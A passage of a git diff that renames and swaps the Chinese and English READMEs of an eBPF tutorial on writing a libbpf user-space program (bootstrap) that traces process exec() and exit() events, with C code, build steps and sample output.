(handled by the SEC("tp/sched/sched_process_exit") handle_exit BPF program) to understand when each process exits. -这两个 BPF 程序共同工作,允许捕获关于新进程的有趣信息,例如二进制文件的文件名,以及测量进程的生命周期,并在进程结束时收集有趣的统计信息,例如退出代码或消耗的资源量等。这是深入了解内核内部并观察事物如何真正运作的良好起点。 +These two BPF programs work together to capture interesting information about new processes, such as the file name of the binary and measure the lifecycle of processes. They also collect interesting statistics, such as exit codes or resource consumption, when a process exits. This is a good starting point to gain a deeper understanding of the inner workings of the kernel and observe how things actually operate. -Bootstrap 还使用 argp API(libc 的一部分)进行命令行参数解析,使得用户可以通过命令行选项配置应用行为。这种方式提供了灵活性,让用户能够根据实际需求自定义程序行为。虽然这些功能使用 eunomia-bpf 工具也可以实现,但是这里我们使用 libbpf 可以在用户态提供更高的可扩展性,不过也带来了不少额外的复杂度。 +Bootstrap also uses the argp API (part of libc) for command-line argument parsing, allowing users to configure the behavior of the application through command-line options. This provides flexibility and allows users to customize the program behavior according to their specific needs. While these functionalities can also be achieved using the eunomia-bpf tool, using libbpf here provides higher scalability in user space at the cost of additional complexity. ## Bootstrap -Bootstrap 分为两个部分:内核态和用户态。内核态部分是一个 eBPF 程序,它跟踪 exec() 和 exit() 系统调用。用户态部分是一个 C 语言程序,它使用 libbpf 库来加载和运行内核态程序,并处理从内核态程序收集的数据。 +Bootstrap consists of two parts: kernel space and user space. 
The kernel space part is an eBPF program that traces the exec() and exit() system calls. The user space part is a C language program that uses the libbpf library to load and run the kernel space program and process the data collected from the kernel space program. -### 内核态 eBPF 程序 bootstrap.bpf.c +### Kernel-space eBPF Program bootstrap.bpf.c ```c // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause @@ -108,7 +108,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) struct event *e; pid_t pid, tid; u64 id, ts, *start_ts, duration_ns = 0; - + /* get PID and TID of exiting thread/process */ id = bpf_get_current_pid_tgid(); pid = id >> 32; @@ -120,8 +120,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) /* if we recorded start of the process, calculate lifetime duration */ start_ts = bpf_map_lookup_elem(&exec_start, &pid); - if (start_ts) - duration_ns = bpf_ktime_get_ns() - *start_ts; + if (start_ts) + duration_ns = bpf_ktime_get_ns() - *start_ts; else if (min_duration_ns) return 0; bpf_map_delete_elem(&exec_start, &pid); @@ -151,9 +150,9 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -这段代码是一个内核态 eBPF 程序(bootstrap.bpf.c),主要用于跟踪 exec() 和 exit() 系统调用。它通过 eBPF 程序捕获进程的创建和退出事件,并将相关信息发送到用户态程序进行处理。下面是对代码的详细解释。 +This code is a kernel-space eBPF program (`bootstrap.bpf.c`) used to trace `exec()` and `exit()` system calls. It captures process creation and exit events using an eBPF program and sends the relevant information to a user-space program for processing. Below is a detailed explanation of the code. -首先,我们引入所需的头文件,定义 eBPF 程序的许可证以及两个 eBPF maps:exec_start 和 rb。exec_start 是一个哈希类型的 eBPF map,用于存储进程开始执行时的时间戳。rb 是一个环形缓冲区类型的 eBPF map,用于存储捕获的事件数据,并将其发送到用户态程序。 +First, we include the necessary headers and define the license for the eBPF program. We also define two eBPF maps: `exec_start` and `rb`. `exec_start` is a hash type eBPF map used to store the timestamp when a process starts executing. `rb` is a ring buffer type eBPF map used to store captured event data and send it to the user-space program. ```c #include "vmlinux.h" @@ -179,7 +178,7 @@ struct { const volatile unsigned long long min_duration_ns = 0; ``` -接下来,我们定义了一个名为 handle_exec 的 eBPF 程序,它会在进程执行 exec() 系统调用时触发。首先,我们从当前进程中获取 PID,记录进程开始执行的时间戳,然后将其存储在 exec_start map 中。 +Next, we define an eBPF program named `handle_exec` which is triggered when a process executes the `exec()` system call. First, we retrieve the PID from the current process, record the timestamp when the process starts executing, and store it in the `exec_start` map. ```c SEC("tp/sched/sched_process_exec") @@ -194,7 +193,7 @@ int handle_exec(struct trace_event_raw_sched_process_exec *ctx) } ``` -然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名等。之后,我们将这些数据发送到用户态程序进行处理。 +Then, we reserve an event structure from the ring buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, and process name. Afterwards, we send this data to the user-space program for processing. ```c // reserve sample from BPF ringbuf @@ -218,7 +217,7 @@ int handle_exec(struct trace_event_raw_sched_process_exec *ctx) return 0; ``` -最后,我们定义了一个名为 handle_exit 的 eBPF 程序,它会在进程执行 exit() 系统调用时触发。首先,我们从当前进程中获取 PID 和 TID(线程 ID)。如果 PID 和 TID 不相等,说明这是一个线程退出,我们将忽略此事件。 +Finally, we define an eBPF program named `handle_exit` that will be triggered when a process executes the `exit()` system call. First, we retrieve the PID and TID (thread ID) from the current process.
If the PID and TID are not equal, it means that this is a thread exit, and we will ignore this event. ```c SEC("tp/sched/sched_process_exit") @@ -237,7 +236,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -接着,我们查找之前存储在 exec_start map 中的进程开始执行的时间戳。如果找到了时间戳,我们将计算进程的生命周期(持续时间),然后从 exec_start map 中删除该记录。如果未找到时间戳且指定了最小持续时间,则直接返回。 +Next, we look up the timestamp of when the process started execution, which was previously stored in the `exec_start` map. If a timestamp is found, we calculate the process's lifetime duration and then remove the record from the `exec_start` map. If a timestamp is not found and a minimum duration is specified, we return directly. ```c // if we recorded start of the process, calculate lifetime duration @@ -253,7 +252,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) return 0; ``` -然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名、进程持续时间等。最后,我们将这些数据发送到用户态程序进行处理。 +Then, we reserve an event structure from the ring buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, process name, and process duration. Finally, we send this data to the user-space program for processing. ```c /* reserve sample from BPF ringbuf */ @@ -265,21 +264,21 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) task = (struct task_struct *)bpf_get_current_task(); e->exit_event = true; - e->duration_ns = duration_ns; - e->pid = pid; - e->ppid = BPF_CORE_READ(task, real_parent, tgid); - e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); + e->duration_ns = duration_ns; + e->pid = pid; + e->ppid = BPF_CORE_READ(task, real_parent, tgid); + e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); - /* send data to user-space for post-processing */ - bpf_ringbuf_submit(e, 0); - return 0; + /* send data to user-space for post-processing */ + bpf_ringbuf_submit(e, 0); + return 0; } ``` -这样,当进程执行 exec() 或 exit() 系统调用时,我们的 eBPF 程序会捕获相应的事件,并将详细信息发送到用户态程序进行后续处理。这使得我们可以轻松地监控进程的创建和退出,并获取有关进程的详细信息。 +This way, when a process executes the exec() or exit() system calls, our eBPF program captures the corresponding events and sends detailed information to the user space program for further processing. This allows us to easily monitor process creation and termination and obtain detailed information about the processes.
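A note on the `exit_code` line in `handle_exit` above: the kernel keeps a wait-style status word in `task->exit_code`, with the exit code in bits 8-15, which is why the program extracts it as `(exit_code >> 8) & 0xff`. A minimal user-space sketch of the same decoding, written here purely for illustration with the standard wait macros (not part of bootstrap):

```c
#include <stdio.h>
#include <sys/wait.h>

int main(void)
{
    /* A wait-style status word for a process that exited with code 3:
     * the exit code sits in bits 8-15, exactly what the BPF program
     * recovers with (exit_code >> 8) & 0xff. */
    int status = 3 << 8;

    if (WIFEXITED(status))
        printf("exit code: %d\n", WEXITSTATUS(status)); /* prints 3 */
    return 0;
}
```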
-除此之外,在 bootstrap.h 中,我们还定义了和用户态交互的数据结构: +In addition, in the bootstrap.h file, we also define the data structures for interaction with user space: ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -303,7 +302,7 @@ struct event { #endif /* __BOOTSTRAP_H */ ``` -### 用户态,bootstrap.c +### User space, bootstrap.c ```c // SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) @@ -347,18 +346,18 @@ static error_t parse_arg(int key, char *arg, struct argp_state *state) case 'd': errno = 0; env.min_duration_ms = strtol(arg, NULL, 10); - if (errno || env.min_duration_ms <= 0) { - fprintf(stderr, "Invalid duration: %s\n", arg); - argp_usage(state); - } - break; - case ARGP_KEY_ARG: - argp_usage(state); - break; - default: - return ARGP_ERR_UNKNOWN; - } - return 0; + if (errno || env.min_duration_ms <= 0) { + fprintf(stderr, "Invalid duration: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; } static const struct argp argp = { @@ -458,7 +457,7 @@ int main(int argc, char **argv) /* Process events */ printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); + "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); while (!exiting) { err = ring_buffer__poll(rb, 100 /* timeout, ms */); /* Ctrl-C will cause -EINTR */ @@ -481,9 +480,9 @@ cleanup: } ``` -这个用户态程序主要用于加载、验证、附加 eBPF 程序,以及接收 eBPF 程序收集的事件数据,并将其打印出来。我们将分析一些关键部分。 +This user-space program is mainly used to load, verify, and attach the eBPF programs, and to receive the event data they collect and print it out. We will analyze some key parts. -首先,我们定义了一个 env 结构,用于存储命令行参数: +First, we define an env structure to store command line arguments: ```c static struct env { @@ -492,7 +491,7 @@ static struct env { } env; ``` -接下来,我们使用 argp 库来解析命令行参数: +Next, we use the argp library to parse command line arguments: ```c static const struct argp_option opts[] = { @@ -513,17 +512,16 @@ static const struct argp argp = { }; ``` -main() 函数中,首先解析命令行参数,然后设置 libbpf 的打印回调函数 libbpf_print_fn,以便在需要时输出调试信息: +In the main() function, we first parse the command line arguments, and then set the libbpf print callback function libbpf_print_fn to output debug information when needed: ```c err = argp_parse(&argp, argc, argv, 0, NULL, NULL); if (err) return err; - libbpf_set_print(libbpf_print_fn); ``` -接下来,我们打开 eBPF 脚手架(skeleton)文件,将最小持续时间参数传递给 eBPF 程序,并加载和附加 eBPF 程序: +Next, we open the eBPF skeleton file, pass the minimum duration parameter to the eBPF program, and load and attach the eBPF program: ```c skel = bootstrap_bpf__open(); @@ -547,7 +545,7 @@ if (err) { } ``` -然后,我们创建一个环形缓冲区(ring buffer),用于接收 eBPF 程序发送的事件数据: +Then, we create a ring buffer to receive event data sent by the eBPF program: ```c rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); @@ -558,9 +556,9 @@ if (!rb) { } ``` -handle_event() 函数会处理从 eBPF 程序收到的事件。根据事件类型(进程执行或退出),它会提取并打印事件信息,如时间戳、进程名、进程 ID、父进程 ID、文件名或退出代码等。 +The handle_event() function handles events received from the eBPF program. Depending on the event type (process execution or exit), it extracts and prints event information such as timestamp, process name, process ID, parent process ID, file name, or exit code.
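Since bootstrap.c is only excerpted above and `handle_event()` itself is not shown, here is a minimal sketch of what such a ring-buffer callback can look like. The callback signature is the one required by libbpf's `ring_buffer__new()`; field names such as `filename` assume the `struct event` declared in bootstrap.h, and the exact formatting in the real bootstrap.c may differ:

```c
#include <stdio.h>
#include <time.h>
#include "bootstrap.h"

static int handle_event(void *ctx, void *data, size_t data_sz)
{
    const struct event *e = data;
    char ts[32];
    time_t t;

    /* Stamp each event with the current wall-clock time. */
    time(&t);
    strftime(ts, sizeof(ts), "%H:%M:%S", localtime(&t));

    if (e->exit_event)
        printf("%-8s %-5s %-16s %-7d %-7d [%u]\n",
               ts, "EXIT", e->comm, e->pid, e->ppid, e->exit_code);
    else
        printf("%-8s %-5s %-16s %-7d %-7d %s\n",
               ts, "EXEC", e->comm, e->pid, e->ppid, e->filename);
    return 0; /* a negative return would abort ring_buffer__poll() */
}
```

With this callback registered via `ring_buffer__new()`, each sample delivered by `ring_buffer__poll()` becomes one row of the TIME/EVENT/COMM/PID/PPID table shown in the run log below.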
-最后,我们使用 ring_buffer__poll() 函数轮询环形缓冲区,处理收到的事件数据: +Finally, we use the ring_buffer__poll() function to poll the ring buffer and process the received event data: ```c while (!exiting) { @@ -569,7 +567,7 @@ while (!exiting) { } ``` -当程序收到 SIGINT 或 SIGTERM 信号时,它会最后完成清理、退出操作,关闭和卸载 eBPF 程序: +When the program receives the SIGINT or SIGTERM signal, it completes the final cleanup and exit operations, and closes and unloads the eBPF program: ```c cleanup: @@ -581,25 +579,25 @@ cleanup: } ``` -## 安装依赖 +## Dependency Installation -构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 +Building the example requires clang, libelf, and zlib. The package names may vary in different distributions. -在 Ubuntu/Debian 上,你需要执行以下命令: +On Ubuntu/Debian, you need to execute the following command: ```shell sudo apt install clang libelf1 libelf-dev zlib1g-dev ``` -在 CentOS/Fedora 上,你需要执行以下命令: +On CentOS/Fedora, you need to execute the following command: ```shell sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel ``` -## 编译运行 +## Compile and Run -编译运行上述代码: +Compile and run the above code: ```console $ git submodule update --init --recursive @@ -614,15 +612,22 @@ TIME EVENT COMM PID PPID FILENAME/EXIT CODE 03:16:41 EXEC sh 110688 80168 /bin/sh 03:16:41 EXEC which 110689 110688 /usr/bin/which 03:16:41 EXIT which 110689 110688 [0] (0ms) -03:16:41 EXIT sh 110688 80168 [0] (0ms) -03:16:41 EXEC sh 110690 80168 /bin/sh -03:16:41 EXEC ps 110691 110690 /usr/bin/ps -03:16:41 EXIT ps 110691 110690 [0] (49ms) -03:16:41 EXIT sh 110690 80168 [0] (51ms) +03:16:41 EXIT sh 110688 80168 [0] (0ms) ``` -## 总结 +The complete source code can be found at -通过这个实例,我们了解了如何将 eBPF 程序与用户态程序结合使用。这种结合为开发者提供了一个强大的工具集,可以实现跨内核和用户空间的高效数据收集和处理。通过使用 eBPF 和 libbpf,您可以构建更高效、可扩展和安全的监控和性能分析工具。 +## Summary -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +Through this example, we have learned how to combine eBPF programs with user-space programs. This combination provides developers with a powerful toolkit for efficient data collection and processing across the kernel and user space. By using eBPF and libbpf, you can build more efficient, scalable, and secure monitoring and performance analysis tools. + +In the following tutorials, we will continue to explore the advanced features of eBPF and share more about eBPF development practices. Through continuous learning and practice, you will have a better understanding and mastery of eBPF technology and apply it to solve real-world problems. + +If you would like to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository at or website for more examples and complete tutorials. + +## Reference + +- [Building BPF applications with libbpf-bootstrap](https://nakryiko.com/posts/libbpf-bootstrap/) +- + +> The original link of this article: diff --git a/src/11-bootstrap/README_en.md b/src/11-bootstrap/README.zh.md similarity index 53% rename from src/11-bootstrap/README_en.md rename to src/11-bootstrap/README.zh.md index 0970a50..48ea26f 100644 --- a/src/11-bootstrap/README_en.md +++ b/src/11-bootstrap/README.zh.md @@ -1,41 +1,41 @@ -# eBPF Tutorial by Example 11: Develop User-Space Programs with libbpf and Trace exec() and exit() +# eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用 -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel.
It allows developers to dynamically load, update, and run user-defined code during kernel runtime. +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 -In this tutorial, we will learn how kernel-space and user-space eBPF programs work together. We will also learn how to use the native libbpf to develop user-space programs, package eBPF applications into executable files, and distribute them across different kernel versions. +在本教程中,我们将了解内核态和用户态的 eBPF 程序是如何协同工作的。我们还将学习如何使用原生的 libbpf 开发用户态程序,将 eBPF 应用打包为可执行文件,实现跨内核版本分发。 -## The libbpf Library and Why We Need to Use It +## libbpf 库,以及为什么需要使用它 -libbpf is a C language library that is distributed with the kernel version to assist in loading and running eBPF programs. It provides a set of C APIs for interacting with the eBPF system, allowing developers to write user-space programs more easily to load and manage eBPF programs. These user-space programs are typically used for system performance analysis, monitoring, or optimization. +libbpf 是一个 C 语言库,伴随内核版本分发,用于辅助 eBPF 程序的加载和运行。它提供了用于与 eBPF 系统交互的一组 C API,使开发者能够更轻松地编写用户态程序来加载和管理 eBPF 程序。这些用户态程序通常用于分析、监控或优化系统性能。 -There are several advantages to using the libbpf library: +使用 libbpf 库有以下优势: -- It simplifies the process of loading, updating, and running eBPF programs. -- It provides a set of easy-to-use APIs, allowing developers to focus on writing core logic instead of dealing with low-level details. -- It ensures compatibility with the eBPF subsystem in the kernel, reducing maintenance costs. +- 它简化了 eBPF 程序的加载、更新和运行过程。 +- 它提供了一组易于使用的 API,使开发者能够专注于编写核心逻辑,而不是处理底层细节。 +- 它能够确保与内核中的 eBPF 子系统的兼容性,降低了维护成本。 -At the same time, libbpf and BTF (BPF Type Format) are important components of the eBPF ecosystem. They play critical roles in achieving compatibility across different kernel versions. BTF is a metadata format used to describe type information in eBPF programs. The primary purpose of BTF is to provide a structured way to describe data structures in the kernel so that eBPF programs can access and manipulate them more easily. +同时,libbpf 和 BTF(BPF Type Format)都是 eBPF 生态系统的重要组成部分。它们各自在实现跨内核版本兼容方面发挥着关键作用。BTF(BPF Type Format)是一种元数据格式,用于描述 eBPF 程序中的类型信息。BTF 的主要目的是提供一种结构化的方式,以描述内核中的数据结构,以便 eBPF 程序可以更轻松地访问和操作它们。 -The key roles of BTF in achieving compatibility across different kernel versions are as follows: +BTF 在实现跨内核版本兼容方面的关键作用如下: -- BTF allows eBPF programs to access detailed type information of kernel data structures without hardcoding specific kernel versions. This enables eBPF programs to adapt to different kernel versions, achieving compatibility across kernel versions. -- By using BPF CO-RE (Compile Once, Run Everywhere) technology, eBPF programs can leverage BTF to parse the type information of kernel data structures during compilation, thereby generating eBPF programs that can run on different kernel versions. +- BTF 允许 eBPF 程序访问内核数据结构的详细类型信息,而无需对特定内核版本进行硬编码。这使得 eBPF 程序可以适应不同版本的内核,从而实现跨内核版本兼容。 +- 通过使用 BPF CO-RE(Compile Once, Run Everywhere)技术,eBPF 程序可以利用 BTF 在编译时解析内核数据结构的类型信息,进而生成可以在不同内核版本上运行的 eBPF 程序。 -By combining libbpf and BTF, eBPF programs can run on various kernel versions without the need for separate compilation for each kernel version. This greatly improves the portability and compatibility of the eBPF ecosystem and reduces the difficulty of development and maintenance. 
+结合 libbpf 和 BTF,eBPF 程序可以在各种不同版本的内核上运行,而无需为每个内核版本单独编译。这极大地提高了 eBPF 生态系统的可移植性和兼容性,降低了开发和维护的难度。 -## What is Bootstrap +## 什么是 bootstrap -Bootstrap is a complete application that utilizes libbpf. It uses eBPF programs to trace the exec() system call in the kernel (handled by the SEC("tp/sched/sched_process_exec") handle_exec BPF program), which mainly corresponds to the creation of new processes (excluding the fork() part). In addition, it also traces the exit() system call of processes (handled by the SEC("tp/sched/sched_process_exit") handle_exit BPF program) to understand when each process exits. +Bootstrap 是一个使用 libbpf 的完整应用,它利用 eBPF 程序来跟踪内核中的 exec() 系统调用(通过 SEC("tp/sched/sched_process_exec") handle_exec BPF 程序),这主要对应于新进程的创建(不包括 fork() 部分)。此外,它还跟踪进程的 exit() 系统调用(通过 SEC("tp/sched/sched_process_exit") handle_exit BPF 程序),以了解每个进程何时退出。 -These two BPF programs work together to capture interesting information about new processes, such as the file name of the binary and measure the lifecycle of processes. They also collect interesting statistics, such as exit codes or resource consumption, when a process exits. This is a good starting point to gain a deeper understanding of the inner workings of the kernel and observe how things actually operate. +这两个 BPF 程序共同工作,允许捕获关于新进程的有趣信息,例如二进制文件的文件名,以及测量进程的生命周期,并在进程结束时收集有趣的统计信息,例如退出代码或消耗的资源量等。这是深入了解内核内部并观察事物如何真正运作的良好起点。 -Bootstrap also uses the argp API (part of libc) for command-line argument parsing, allowing users to configure the behavior of the application through command-line options. This provides flexibility and allows users to customize the program behavior according to their specific needs. While these functionalities can also be achieved using the eunomia-bpf tool, using libbpf here provides higher scalability in user space at the cost of additional complexity. +Bootstrap 还使用 argp API(libc 的一部分)进行命令行参数解析,使得用户可以通过命令行选项配置应用行为。这种方式提供了灵活性,让用户能够根据实际需求自定义程序行为。虽然这些功能使用 eunomia-bpf 工具也可以实现,但是这里我们使用 libbpf 可以在用户态提供更高的可扩展性,不过也带来了不少额外的复杂度。 ## Bootstrap -Bootstrap consists of two parts: kernel space and user space. The kernel space part is an eBPF program that traces the exec() and exit() system calls. The user space part is a C language program that uses the libbpf library to load and run the kernel space program and process the data collected from the kernel space program. +Bootstrap 分为两个部分:内核态和用户态。内核态部分是一个 eBPF 程序,它跟踪 exec() 和 exit() 系统调用。用户态部分是一个 C 语言程序,它使用 libbpf 库来加载和运行内核态程序,并处理从内核态程序收集的数据。 -### Kernel-space eBPF Program bootstrap.bpf.c +### 内核态 eBPF 程序 bootstrap.bpf.c ```c // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause @@ -108,7 +108,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) struct event *e; pid_t pid, tid; u64 id, ts, *start_ts, duration_ns = 0; - + /* get PID and TID of exiting thread/process */ id = bpf_get_current_pid_tgid(); pid = id >> 32; @@ -120,7 +120,8 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) /* if we recorded start of the process, calculate lifetime duration */ start_ts = bpf_map_lookup_elem(&exec_start, &pid); - if (start_ts)duration_ns = bpf_ktime_get_ns() - *start_ts; + if (start_ts) + duration_ns = bpf_ktime_get_ns() - *start_ts; else if (min_duration_ns) return 0; bpf_map_delete_elem(&exec_start, &pid); @@ -150,9 +151,9 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -This code is a kernel-level eBPF program (`bootstrap.bpf.c`) used to trace `exec()` and `exit()` system calls. 
It captures process creation and exit events using an eBPF program and sends the relevant information to a user-space program for processing. Below is a detailed explanation of the code. +这段代码是一个内核态 eBPF 程序(bootstrap.bpf.c),主要用于跟踪 exec() 和 exit() 系统调用。它通过 eBPF 程序捕获进程的创建和退出事件,并将相关信息发送到用户态程序进行处理。下面是对代码的详细解释。 -First, we include the necessary headers and define the license for the eBPF program. We also define two eBPF maps: `exec_start` and `rb`. `exec_start` is a hash type eBPF map used to store the timestamp when a process starts executing. `rb` is a ring buffer type eBPF map used to store captured event data and send it to the user-space program. +首先,我们引入所需的头文件,定义 eBPF 程序的许可证以及两个 eBPF maps:exec_start 和 rb。exec_start 是一个哈希类型的 eBPF map,用于存储进程开始执行时的时间戳。rb 是一个环形缓冲区类型的 eBPF map,用于存储捕获的事件数据,并将其发送到用户态程序。 ```c #include "vmlinux.h" @@ -178,7 +179,7 @@ struct { const volatile unsigned long long min_duration_ns = 0; ``` -Next, we define an eBPF program named `handle_exec` which is triggered when a process executes the `exec()` system call. First, we retrieve the PID from the current process, record the timestamp when the process starts executing, and store it in the `exec_start` map. +接下来,我们定义了一个名为 handle_exec 的 eBPF 程序,它会在进程执行 exec() 系统调用时触发。首先,我们从当前进程中获取 PID,记录进程开始执行的时间戳,然后将其存储在 exec_start map 中。 ```c SEC("tp/sched/sched_process_exec") @@ -193,7 +194,7 @@ int handle_exec(struct trace_event_raw_sched_process_exec *ctx) } ``` -Then, we reserve an event structure from the circular buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, and process name. Afterwards, we send this data to the user-mode program for processing. +然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名等。之后,我们将这些数据发送到用户态程序进行处理。 ```c // reserve sample from BPF ringbuf @@ -217,7 +218,7 @@ Then, we reserve an event structure from the circular buffer map `rb` and fill i return 0; ``` -Finally, we define an eBPF program named `handle_exit` that will be triggered when a process executes the `exit()` system call. First, we retrieve the PID and TID (thread ID) from the current process. If the PID and TID are not equal, it means that this is a thread exit, and we will ignore this event. +最后,我们定义了一个名为 handle_exit 的 eBPF 程序,它会在进程执行 exit() 系统调用时触发。首先,我们从当前进程中获取 PID 和 TID(线程 ID)。如果 PID 和 TID 不相等,说明这是一个线程退出,我们将忽略此事件。 ```c SEC("tp/sched/sched_process_exit") @@ -236,7 +237,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -Next, we look up the timestamp of when the process started execution, which was previously stored in the `exec_start` map. If a timestamp is found, we calculate the process's lifetime duration and then remove the record from the `exec_start` map. If a timestamp is not found and a minimum duration is specified, we return directly. +接着,我们查找之前存储在 exec_start map 中的进程开始执行的时间戳。如果找到了时间戳,我们将计算进程的生命周期(持续时间),然后从 exec_start map 中删除该记录。如果未找到时间戳且指定了最小持续时间,则直接返回。 ```c // if we recorded start of the process, calculate lifetime duration @@ -252,7 +253,7 @@ Next, we look up the timestamp of when the process started execution, which was return 0; ``` -Then, we reserve an event structure from the circular buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, process name, and process duration. Finally, we send this data to the user-mode program for processing. 
+然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名、进程持续时间等。最后,我们将这些数据发送到用户态程序进行处理。 ```c /* reserve sample from BPF ringbuf */ @@ -264,21 +265,21 @@ Then, we reserve an event structure from the circular buffer map `rb` and fill i task = (struct task_struct *)bpf_get_current_task(); e->exit_event = true; - e->duration_ns = duration_ns;``` -e->pid = pid; -e->ppid = BPF_CORE_READ(task, real_parent, tgid); -e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; -bpf_get_current_comm(&e->comm, sizeof(e->comm)); + e->duration_ns = duration_ns; + e->pid = pid; + e->ppid = BPF_CORE_READ(task, real_parent, tgid); + e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); -/* send data to user-space for post-processing */ -bpf_ringbuf_submit(e, 0); -return 0; + /* send data to user-space for post-processing */ + bpf_ringbuf_submit(e, 0); + return 0; } ``` -This way, when a process executes the exec() or exit() system calls, our eBPF program captures the corresponding events and sends detailed information to the user space program for further processing. This allows us to easily monitor process creation and termination and obtain detailed information about the processes. +这样,当进程执行 exec() 或 exit() 系统调用时,我们的 eBPF 程序会捕获相应的事件,并将详细信息发送到用户态程序进行后续处理。这使得我们可以轻松地监控进程的创建和退出,并获取有关进程的详细信息。 -In addition, in the bootstrap.h file, we also define the data structures for interaction with user space: +除此之外,在 bootstrap.h 中,我们还定义了和用户态交互的数据结构: ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -302,7 +303,7 @@ struct event { #endif /* __BOOTSTRAP_H */ ``` -### User space, bootstrap.c +### 用户态,bootstrap.c ```c // SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) @@ -346,18 +347,18 @@ static error_t parse_arg(int key, char *arg, struct argp_state *state) case 'd': errno = 0; env.min_duration_ms = strtol(arg, NULL, 10); - if (errno || env.min_duration_ms <= 0) { - fprintf(stderr, "Invalid duration: %s\n", arg); - argp_usage(state); -} -break; -case ARGP_KEY_ARG: - argp_usage(state); - break; -default: - return ARGP_ERR_UNKNOWN; -} -return 0; + if (errno || env.min_duration_ms <= 0) { + fprintf(stderr, "Invalid duration: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; } static const struct argp argp = { @@ -457,7 +458,7 @@ int main(int argc, char **argv) /* Process events */ printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); + "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); while (!exiting) { err = ring_buffer__poll(rb, 100 /* timeout, ms */); /* Ctrl-C will cause -EINTR */ @@ -480,9 +481,9 @@ cleanup: } ``` -This user-level program is mainly used to load, verify, attach eBPF programs, and receive event data collected by eBPF programs and print it out. We will analyze some key parts. 
+这个用户态程序主要用于加载、验证、附加 eBPF 程序,以及接收 eBPF 程序收集的事件数据,并将其打印出来。我们将分析一些关键部分。 -First, we define an env structure to store command line arguments: +首先,我们定义了一个 env 结构,用于存储命令行参数: ```c static struct env { @@ -491,7 +492,7 @@ static struct env { } env; ``` -Next, we use the argp library to parse command line arguments: +接下来,我们使用 argp 库来解析命令行参数: ```c static const struct argp_option opts[] = { @@ -512,16 +513,17 @@ static const struct argp argp = { }; ``` -In the main() function, we first parse the command line arguments, and then set the libbpf print callback function libbpf_print_fn to output debug information when needed: +main() 函数中,首先解析命令行参数,然后设置 libbpf 的打印回调函数 libbpf_print_fn,以便在需要时输出调试信息: ```c err = argp_parse(&argp, argc, argv, 0, NULL, NULL); if (err) return err; + libbpf_set_print(libbpf_print_fn); ``` -Next, we open the eBPF skeleton file, pass the minimum duration parameter to the eBPF program, and load and attach the eBPF program: +接下来,我们打开 eBPF 脚手架(skeleton)文件,将最小持续时间参数传递给 eBPF 程序,并加载和附加 eBPF 程序: ```c skel = bootstrap_bpf__open(); @@ -545,7 +547,7 @@ if (err) { } ``` -Then, we create a ring buffer to receive event data sent by the eBPF program: +然后,我们创建一个环形缓冲区(ring buffer),用于接收 eBPF 程序发送的事件数据: ```c rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); @@ -556,9 +558,9 @@ if (!rb) { } ``` -The handle_event() function handles events received from the eBPF program. Depending on the event type (process execution or exit), it extracts and prints event information such as timestamp, process name, process ID, parent process ID, file name, or exit code. +handle_event() 函数会处理从 eBPF 